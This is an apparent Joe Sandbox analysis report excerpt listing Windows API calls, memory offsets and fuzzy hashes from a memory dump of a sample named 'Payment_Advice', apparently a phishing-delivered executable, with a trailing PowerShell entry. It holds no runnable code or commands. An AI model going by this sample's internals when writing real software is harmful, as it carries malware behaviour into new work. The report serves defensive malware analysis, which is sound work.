                                                      • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,00408F50,00000000,00408B2A), ref: 0040925C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Window$CurrentThread$EnableEnumWindows
                                                      • String ID:
                                                      • API String ID: 2527101397-0
                                                      • Opcode ID: 459104275141b0c715442643ba30dab32395702e9f7f189deadac9fa7278c8c8
                                                      • Instruction ID: d7320be81d177d1dafbd7ad4d3aa491d2180030fb93e63f46d4512a3211b406d
                                                      • Opcode Fuzzy Hash: 459104275141b0c715442643ba30dab32395702e9f7f189deadac9fa7278c8c8
                                                      • Instruction Fuzzy Hash: DA11CD31108741BBDB314F56EC48F53BFA9EB81B10F118ABEF065221E1C7749C04C618
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • TlsAlloc.KERNEL32(?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040CFB8
                                                      • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 0040CFCC
                                                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040CFD9
                                                      • TlsGetValue.KERNEL32(00000010,?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040CFF0
                                                      • RtlReAllocateHeap.NTDLL(00000008,00000000), ref: 0040CFFF
                                                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D00E
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Value$AllocateHeap$Alloc
                                                      • String ID:
                                                      • API String ID: 2511646910-0
                                                      • Opcode ID: f8d4ac58cec971f74a9cdcc41d0ae8b1470346a7d61edf378338f4034cbf9928
                                                      • Instruction ID: e522f20ebd739161ea3b186ba5f08d5ad4d1c0e942c2e649f6f8b5b45fa9f158
                                                      • Opcode Fuzzy Hash: f8d4ac58cec971f74a9cdcc41d0ae8b1470346a7d61edf378338f4034cbf9928
                                                      • Instruction Fuzzy Hash: 0E115172644311BFD7109F65EC44EA6BBBAFB48750B05803AF904D73A0DB75D8048A98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • UnregisterWait.KERNEL32(?), ref: 0041198E
                                                      • CloseHandle.KERNEL32(?), ref: 00411997
                                                      • RtlEnterCriticalSection.NTDLL(00417660), ref: 004119A3
                                                      • RtlLeaveCriticalSection.NTDLL(00417660), ref: 004119C8
                                                      • HeapFree.KERNEL32(00000000,?), ref: 004119E6
                                                      • HeapFree.KERNEL32(?,?), ref: 004119F8
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                                      • String ID:
                                                      • API String ID: 4204870694-0
                                                      • Opcode ID: b15370ecc5d11d915fbc3e1ce94f3eb57d9f5ff0b77fa269a9f14ba5a6eba08a
                                                      • Instruction ID: eb1efa575c7a1193ad789bfe2817c469877bfdc7e410445902cedd1c0dbf730b
                                                      • Opcode Fuzzy Hash: b15370ecc5d11d915fbc3e1ce94f3eb57d9f5ff0b77fa269a9f14ba5a6eba08a
                                                      • Instruction Fuzzy Hash: E60117B4202602AFC7148F15EC88EAABF79FF493117118139E62A86620C731E851CB9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • memset.MSVCRT ref: 0040555C
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040556B
                                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040557B
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcmemset
                                                      • String ID: RtlGetVersion$ntdll.dll
                                                      • API String ID: 3137504439-1489217083
                                                      • Opcode ID: 7c8b8c6c6b7fc7594bb483547fa99cc840af9721d0a9f5de1a7f0785217d556d
                                                      • Instruction ID: 4c3a86b3ef4fb80ccf96d51786c1ad7f8faddb0dd8553e640a4690cba62d6515
                                                      • Opcode Fuzzy Hash: 7c8b8c6c6b7fc7594bb483547fa99cc840af9721d0a9f5de1a7f0785217d556d
                                                      • Instruction Fuzzy Hash: 2CE0D8317505113AD6205B316C05FEB3A9DCFC9704B110536B545F21C4D678C5018ABD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,00001000,00000000,00000000,00000000,?), ref: 004054A5
                                                      • RtlEnterCriticalSection.NTDLL(00417680), ref: 004054B7
                                                      • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000), ref: 004054CE
                                                      • CloseHandle.KERNEL32(00000008,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004054DA
                                                        • Part of subcall function 0040D772: HeapFree.KERNEL32(00000000,?,0040926D,004170C4,00000008,?,?,?,?,00408F50,00000000,00408B2A), ref: 0040D7AB
                                                      • RtlLeaveCriticalSection.NTDLL(00417680), ref: 0040551D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 3708593966-0
                                                      • Opcode ID: f9fc4f274073ef879c89f055458ad22c593e0fdcee0f3c8d66018c8da72653c2
                                                      • Instruction ID: 79bf3139b6f1ab76d1202ff17a489f7276a24f81600fa3e90aae253bd74edf71
                                                      • Opcode Fuzzy Hash: f9fc4f274073ef879c89f055458ad22c593e0fdcee0f3c8d66018c8da72653c2
                                                      • Instruction Fuzzy Hash: CF11C232544711AFD7105F68EC44FD7BBB8EF45761722803AF804972A1DB75E8808BAC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(004175FC), ref: 0040D59A
                                                      • RtlLeaveCriticalSection.NTDLL(004175FC), ref: 0040D5EF
                                                        • Part of subcall function 0040D586: HeapFree.KERNEL32(00000000,?,?,00409B28,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D5E8
                                                      • RtlDeleteCriticalSection.NTDLL(00000020), ref: 0040D608
                                                      • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409B28,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3), ref: 0040D617
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                      • String ID:
                                                      • API String ID: 3171405041-0
                                                      • Opcode ID: 83fa752a7cac786abdb8633e5ae663743960f93593eff6c1d174bce996cff11c
                                                      • Instruction ID: 3d4c950c7840245ecf787318483d856215c0b9662098a14833ae3b93709eff97
                                                      • Opcode Fuzzy Hash: 83fa752a7cac786abdb8633e5ae663743960f93593eff6c1d174bce996cff11c
                                                      • Instruction Fuzzy Hash: CE110435501602AFC7249F55EC48F97BBB9EB48305F12843AA816A26A1CB35E845CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0040DEA0: TlsGetValue.KERNEL32(0000000E), ref: 0040DEAC
                                                        • Part of subcall function 0040DEA0: RtlReAllocateHeap.NTDLL(03410000,00000000,00000000,?), ref: 0040DF07
                                                      • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401991,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004092F4
                                                      • wcscmp.MSVCRT ref: 00409302
                                                      • memmove.MSVCRT ref: 0040931A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateFileHeapModuleNameValuememmovewcscmp
                                                      • String ID: \\?\
                                                      • API String ID: 2309408642-4282027825
                                                      • Opcode ID: fd930755749ed3d2be605ff4be820197e70570634f0ba2bf411523a77f39549e
                                                      • Instruction ID: d1022656d2e26dd14f3e25edef1fec080478658712660f720d71a31c09dbf965
                                                      • Opcode Fuzzy Hash: fd930755749ed3d2be605ff4be820197e70570634f0ba2bf411523a77f39549e
                                                      • Instruction Fuzzy Hash: 8CF0E2B35006017AC20067BAEC85CAB7B6CEF95370780023FF515D20D6EA38D81486A8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: memset$memcpy
                                                      • String ID:
                                                      • API String ID: 368790112-0
                                                      • Opcode ID: 77a43cbbb6266ba10a119da92b1386f508399576c8cf03208af1230622900171
                                                      • Instruction ID: ff3a12849f14474e25052ccd38566c33d2c186ec74ba694f67bf1beed8dc7c58
                                                      • Opcode Fuzzy Hash: 77a43cbbb6266ba10a119da92b1386f508399576c8cf03208af1230622900171
                                                      • Instruction Fuzzy Hash: 89212531B907086BE524AA29DC86F9F738CDB86708F50063EF201FA1C1D67DE54547AE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeapwcsncpy
                                                      • String ID:
                                                      • API String ID: 1358295784-0
                                                      • Opcode ID: dbefc154c3fd0c86216f953ee4b31303624e33edbc8c1b27b50f459021298698
                                                      • Instruction ID: c1c3d513005c3c241562a142b51836119b7241697b797653b2b83cf70e1dc3f7
                                                      • Opcode Fuzzy Hash: dbefc154c3fd0c86216f953ee4b31303624e33edbc8c1b27b50f459021298698
                                                      • Instruction Fuzzy Hash: DF51C030508B069BDB209F28D844A6B77F4FF84348F544A2EFC45A72D0E779E905CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 0040D1D3
                                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0040D288
                                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0040D2AB
                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 0040D303
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateCriticalHeapSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3625150316-0
                                                      • Opcode ID: c10679976362d654b585f1ec8b68fb6b9a3b4e8ac0eceb1a9ed7d32880a1cb5b
                                                      • Instruction ID: a17e627e050f24daf4e0fc7d3c0e54bac809a59e300a572b9792337043ee6586
                                                      • Opcode Fuzzy Hash: c10679976362d654b585f1ec8b68fb6b9a3b4e8ac0eceb1a9ed7d32880a1cb5b
                                                      • Instruction Fuzzy Hash: B951E470A01B029FC728CFA9D580926B7F4FF587103158A7EE89AD7A50D334F959CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CharLower
                                                      • String ID:
                                                      • API String ID: 1615517891-0
                                                      • Opcode ID: 7e3cda2dc92e76a3f7f6f8fc87e0455d9eabfe1fe7eb39cd3677ec52a9aeb089
                                                      • Instruction ID: d067756844b34a6404b07e6cf1397282c6a25047d21fa5d7bde466b1de65efe4
                                                      • Opcode Fuzzy Hash: 7e3cda2dc92e76a3f7f6f8fc87e0455d9eabfe1fe7eb39cd3677ec52a9aeb089
                                                      • Instruction Fuzzy Hash: E42146756043058BC720EF5998405BBB7E4EB80760F86447AFC86A3380D638EE159BE9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeapmemsetwcscpywcslen
                                                      • String ID:
                                                      • API String ID: 2037025450-0
                                                      • Opcode ID: a20fb1cacd0096f501daf125df341b11e239634ed8c318d74144b3a8a3b1d6da
                                                      • Instruction ID: 3306218dfe6fd6935e1b76e0e8dc860d4400add17917e302399b454d6a157e83
                                                      • Opcode Fuzzy Hash: a20fb1cacd0096f501daf125df341b11e239634ed8c318d74144b3a8a3b1d6da
                                                      • Instruction Fuzzy Hash: A121F472504701AFD721AF65D840B6BB7E9EF88314F14892FF64562692CB39EC048B18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,?,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409B3A
                                                        • Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B46
                                                        • Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,?,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409B5A
                                                        • Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,00000000,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B70
                                                      • RtlAllocateHeap.NTDLL(00000000,0000003C,00000200), ref: 00409A3F
                                                      • RtlAllocateHeap.NTDLL(00000008,00000015), ref: 00409A65
                                                      • RtlAllocateHeap.NTDLL(00000008,FFFFFFED,FFFFFFED), ref: 00409AC2
                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409ADC
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Heap$Free$Allocate
                                                      • String ID:
                                                      • API String ID: 3472947110-0
                                                      • Opcode ID: 8d405e1b173177ea89790586d235f10fc7f712f384bf1d367d23111c52829df9
                                                      • Instruction ID: 4b0fe6378f6027ada2d8db74ddc61b51f9462678ded80081bad5b8da7f184a0e
                                                      • Opcode Fuzzy Hash: 8d405e1b173177ea89790586d235f10fc7f712f384bf1d367d23111c52829df9
                                                      • Instruction Fuzzy Hash: 11213A71701616ABD7109F2AEC41B56BFE8FF48710F51822AF608E76A1D771E821CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • wcslen.MSVCRT ref: 0040DD85
                                                      • RtlAllocateHeap.NTDLL(03410000,00000000,0000000A), ref: 0040DDA9
                                                      • RtlReAllocateHeap.NTDLL(03410000,00000000,00000000,0000000A), ref: 0040DDCD
                                                      • HeapFree.KERNEL32(03410000,00000000), ref: 0040DE04
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Heap$Allocate$Freewcslen
                                                      • String ID:
                                                      • API String ID: 584413571-0
                                                      • Opcode ID: e9c6a98fdd6d39e9826194df6834ea9e2ef42813dacce9c02a3e8dca4dd637a1
                                                      • Instruction ID: ec588af85dbfb1d608d0e9eea2fe4ccce556658423514a2897da8941eef92b66
                                                      • Opcode Fuzzy Hash: e9c6a98fdd6d39e9826194df6834ea9e2ef42813dacce9c02a3e8dca4dd637a1
                                                      • Instruction Fuzzy Hash: 1F211574604209EFCB15CF94D884FAABBB9FF49314F108169F9099B384D734EA41CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040CCF8,00000000), ref: 00411B54
                                                      • malloc.MSVCRT ref: 00411B64
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00411B81
                                                      • malloc.MSVCRT ref: 00411B96
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWidemalloc
                                                      • String ID:
                                                      • API String ID: 2735977093-0
                                                      • Opcode ID: cd29b8decd3b02952837749b88a0da1641af8608c001b95d219bbc5f6800fa44
                                                      • Instruction ID: 6564459d5a016f80208b608040e38cd36fd424a6541425da5bf10ca2b0b8713f
                                                      • Opcode Fuzzy Hash: cd29b8decd3b02952837749b88a0da1641af8608c001b95d219bbc5f6800fa44
                                                      • Instruction Fuzzy Hash: 180164B734030537E3206655AC42FF7770DCBC1B99F19407AFB005E2C1E6ABA9028679
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411BF1
                                                      • malloc.MSVCRT ref: 00411C01
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411C1B
                                                      • malloc.MSVCRT ref: 00411C30
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWidemalloc
                                                      • String ID:
                                                      • API String ID: 2735977093-0
                                                      • Opcode ID: 5cf4b8a5cf85d4fe393516ff7cde79f9285f418483ef15bf1e3af7dcf68b9e2c
                                                      • Instruction ID: e896c43596a717bc1e2b0c4b1148b765e438402798fd5a355992862dcf698edd
                                                      • Opcode Fuzzy Hash: 5cf4b8a5cf85d4fe393516ff7cde79f9285f418483ef15bf1e3af7dcf68b9e2c
                                                      • Instruction Fuzzy Hash: F401247B38031137E3205755AC42FA7774DCBC5B99F19447AFB016E2C0EAA7A9018AB8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D0E3
                                                      • RtlReAllocateHeap.NTDLL(00000008,?,?), ref: 0040D123
                                                      • RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D15E
                                                        • Part of subcall function 0040D7B2: RtlAllocateHeap.NTDLL(00000008,00000000,0040D02C), ref: 0040D7BE
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateCriticalHeapSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3625150316-0
                                                      • Opcode ID: 0a53241ca7917863c4c71313c068b37edaf5ef52ee66f23da44513a19d23a86b
                                                      • Instruction ID: c489c2a9d7d615a57c1fefe1c5f7e248a1051b75451140994bda68c59ab12d69
                                                      • Opcode Fuzzy Hash: 0a53241ca7917863c4c71313c068b37edaf5ef52ee66f23da44513a19d23a86b
                                                      • Instruction Fuzzy Hash: 09112B32600601AFC7209F68EC40E56B7E9EB48321B15892EE596E76A0DB35F844CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D32F
                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D5FE,00000000,00000000,?,00409B28,?,00000200,?,?,00409A2F,00000200), ref: 0040D346
                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D5FE,00000000,00000000,?,00409B28,?,00000200,?,?,00409A2F,00000200), ref: 0040D362
                                                      • RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D37F
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalFreeHeapSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 1298188129-0
                                                      • Opcode ID: d5ac81aa0c71ad19c1c4e0b2d6939d6c54ec4a5825a3dcbcded4acec7e2d012d
                                                      • Instruction ID: c942d341990db50828fe86b1bb11e7c679014380f0fb6b5d63ada0bd3a9fdac0
                                                      • Opcode Fuzzy Hash: d5ac81aa0c71ad19c1c4e0b2d6939d6c54ec4a5825a3dcbcded4acec7e2d012d
                                                      • Instruction Fuzzy Hash: EB012875A0161AEFC7208F95ED0496BBBACFB08750306813AA814A7614C735F825CFA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004053E4: RtlEnterCriticalSection.NTDLL(00417680), ref: 004053EF
                                                        • Part of subcall function 004053E4: RtlLeaveCriticalSection.NTDLL(00417680), ref: 00405422
                                                      • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401D21,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405440
                                                      • RtlEnterCriticalSection.NTDLL(00417680), ref: 0040544C
                                                      • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401D21,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000), ref: 0040546C
                                                        • Part of subcall function 0040D772: HeapFree.KERNEL32(00000000,?,0040926D,004170C4,00000008,?,?,?,?,00408F50,00000000,00408B2A), ref: 0040D7AB
                                                      • RtlLeaveCriticalSection.NTDLL(00417680), ref: 00405480
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                                      • String ID:
                                                      • API String ID: 85618057-0
                                                      • Opcode ID: b1167d0687bed46e093f8ab5fe460e6420eba81e54db401aeab1c784aeeec1fc
                                                      • Instruction ID: c9816872bdd86c647b9bbb3b065009bce871534b551d6c686b05325cb1d870d8
                                                      • Opcode Fuzzy Hash: b1167d0687bed46e093f8ab5fe460e6420eba81e54db401aeab1c784aeeec1fc
                                                      • Instruction Fuzzy Hash: 16F0E232804710EBC6201B65AC48FDBBB78DF44723726883FF94573192C738A8808E6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0040CF28: TlsGetValue.KERNEL32(?,004094C5), ref: 0040CF2F
                                                        • Part of subcall function 0040CF28: RtlAllocateHeap.NTDLL(00000008), ref: 0040CF4A
                                                        • Part of subcall function 0040CF28: TlsSetValue.KERNEL32(00000000,?,?,004094C5), ref: 0040CF59
                                                      • GetCommandLineW.KERNEL32(?,?,?,?,?,?,004094D8,00000000), ref: 00409394
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Value$AllocateCommandHeapLine
                                                      • String ID: $"
                                                      • API String ID: 565049335-3817095088
                                                      • Opcode ID: fa9a74e3e17bce1985ebad787626fd7ba31f7d8c6f90120e3196dee43f12beff
                                                      • Instruction ID: 69e458bc51ecb7c25a8df227a80145383e7ec16cd8de15c0fb13cda22aad0e48
                                                      • Opcode Fuzzy Hash: fa9a74e3e17bce1985ebad787626fd7ba31f7d8c6f90120e3196dee43f12beff
                                                      • Instruction Fuzzy Hash: 1F31C37250C3218ADB749F54981227733A1EBA1B60F18813FE8926B3C2E3B94D42C769
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00409D5A: memset.MSVCRT ref: 00409DC2
                                                        • Part of subcall function 0040D586: RtlEnterCriticalSection.NTDLL(004175FC), ref: 0040D59A
                                                        • Part of subcall function 0040D586: HeapFree.KERNEL32(00000000,?,?,00409B28,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D5E8
                                                        • Part of subcall function 0040D586: RtlLeaveCriticalSection.NTDLL(004175FC), ref: 0040D5EF
                                                      • HeapFree.KERNEL32(00000000,?,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409B3A
                                                      • HeapFree.KERNEL32(00000000,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B46
                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409B5A
                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B70
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                      • String ID:
                                                      • API String ID: 4254243056-0
                                                      • Opcode ID: b07a0de3bc2a029a6d32c3f1ef181170ed56332f7289932ba5d1534fa1d824b7
                                                      • Instruction ID: 705666720bf26b0174e90ab05c41c8e8142486a7e985717f40232ec06a4cc210
                                                      • Opcode Fuzzy Hash: b07a0de3bc2a029a6d32c3f1ef181170ed56332f7289932ba5d1534fa1d824b7
                                                      • Instruction Fuzzy Hash: 36F0C931601515BFC7116B1AFD80D56BFADFF46798352822AB41462631C736FC219AA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1465749796.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffaacca0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
